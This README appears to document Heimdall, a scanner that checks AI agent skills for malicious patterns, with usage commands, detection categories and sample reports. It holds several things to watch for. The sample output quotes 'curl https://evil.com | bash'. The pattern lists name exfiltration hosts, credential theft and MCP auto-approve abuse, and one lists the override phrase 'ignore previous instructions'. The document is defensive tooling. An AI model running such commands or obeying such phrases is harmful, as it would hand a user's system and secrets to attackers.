# Heimdall - Security Scanner for AI Agent Skills Scan OpenClaw skills for malicious patterns before installation. Context-aware scanning with AI-powered narrative analysis. ## When to Use Use Heimdall when: - Installing a new skill from ClawHub or GitHub - Reviewing skills before adding to your workspace - Auditing existing installed skills - Someone shares a skill URL and you want to verify it's safe ## Commands ### Basic Scan ```bash ~/clawd/skills/heimdall/scripts/skill-scan.py /path/to/skill ``` ### AI-Powered Analysis (Recommended) ```bash ~/clawd/skills/heimdall/scripts/skill-scan.py --analyze /path/to/skill ``` Requires `OPENROUTER_API_KEY` env var or `~/clawd/secrets/openrouter.key` ### Scan from URL ```bash # Clone to temp, scan, delete git clone https://github.com/user/skill /tmp/test-skill ~/clawd/skills/heimdall/scripts/skill-scan.py --analyze /tmp/test-skill rm -rf /tmp/test-skill ``` ### Scan All Installed Skills ```bash for skill in ~/clawd/skills/*/; do echo "=== $skill ===" ~/clawd/skills/heimdall/scripts/skill-scan.py "$skill" done ``` ## Options | Flag | Description | |------|-------------| | `--analyze` | AI-powered narrative analysis (uses Claude) | | `--strict` | Ignore context, flag everything | | `--json` | Output as JSON | | `-v, --verbose` | Show all findings | | `--show-suppressed` | Show context-suppressed findings | ## What It Detects (100+ patterns) ### 🚨 Critical - **credential_access**: .env files, API keys, tokens, private keys - **network_exfil**: webhook.site, ngrok, requestbin - **shell_exec**: subprocess, eval, exec, pipe to bash - **remote_fetch**: curl/wget skill.md from internet - **heartbeat_injection**: HEARTBEAT.md modifications - **mcp_abuse**: no_human_approval, auto_approve - **unicode_injection**: Hidden U+E0001-U+E007F characters ### 🔴 High - **supply_chain**: External git repos, npm/pip installs - **telemetry**: OpenTelemetry, Signoz, Uptrace - **crypto_wallet**: BTC/ETH addresses, seed phrases - **impersonation**: "ignore previous instructions" - **privilege**: sudo -S, chmod 777 ### ⚠️ Medium - **prefill_exfil**: Google Forms data exfiltration - **persistence**: crontab, bashrc modifications ## Example Output ### Basic Scan ``` ============================================================ 🔍 SKILL SECURITY SCAN REPORT v4.0 ============================================================ 📁 Path: /tmp/suspicious-skill 📄 Files scanned: 6 🔢 Active issues: 14 ⚡ Max severity: CRITICAL 📋 Action: 🚨 CRITICAL - BLOCKED - Likely malicious ============================================================ 🚨 CRITICAL (3 issues): [shell_exec] • install.sh:12 - Pipe to bash Match: curl https://evil.com | bash ``` ### AI Analysis (--analyze) ``` ============================================================ 🔍 HEIMDALL SECURITY ANALYSIS ============================================================ 📁 Skill: suspicious-skill ⚡ Verdict: 🚨 HIGH RISK - Requires Significant Trust ## Summary This skill installs code from an external company that can self-modify and sends telemetry to third-party servers. ## Key Risks ### 1. Data Exfiltration OpenTelemetry sends execution traces to external servers. YOUR agent's behavior → THEIR servers. 🚨 ### 2. Supply Chain Attack Surface Git clones from external repos during install and self-evolution. ## What You're Agreeing To 1. Installing their code 2. Letting it modify itself 3. Sending telemetry to them ## Recommendation 🔴 Don't install on any machine with real data/keys. ============================================================ ``` ## Context-Aware Scanning Heimdall understands context to reduce false positives (~85% reduction): | Context | Severity Adjustment | |---------|---------------------| | CODE | Full severity | | CONFIG | -1 level | | DOCS | -3 levels (patterns in README are examples) | | STRING | -3 levels (blocklist definitions) | Use `--strict` to disable context adjustment and flag everything. ## Security Sources Patterns derived from: - [Simon Willison - Moltbook Security Analysis](https://simonwillison.net/2026/Jan/30/moltbook/) - [PromptArmor - MCP Tool Attacks](https://promptarmor.com) - [LLMSecurity.net - Auto-Approve Exploits](https://llmsecurity.net) - [OWASP - Injection Attacks](https://owasp.org/Top10/) ## Installation Notes After installing from ClawHub, create an alias for convenience: ```bash echo 'alias skill-scan="~/clawd/skills/heimdall/scripts/skill-scan.py"' >> ~/.bashrc source ~/.bashrc ``` For AI analysis, ensure you have an OpenRouter API key: ```bash # Option 1: Environment variable export OPENROUTER_API_KEY="sk-or-..." # Option 2: Save to file echo "sk-or-..." > ~/clawd/secrets/openrouter.key ``` ## Credits Built by the Enterprise Crew 🚀 - Ada 🔮 (Brain + BD/Sales) - Spock 🖖 (Research & Ops) - Scotty 🔧 (Builder) GitHub: https://github.com/henrino3/heimdall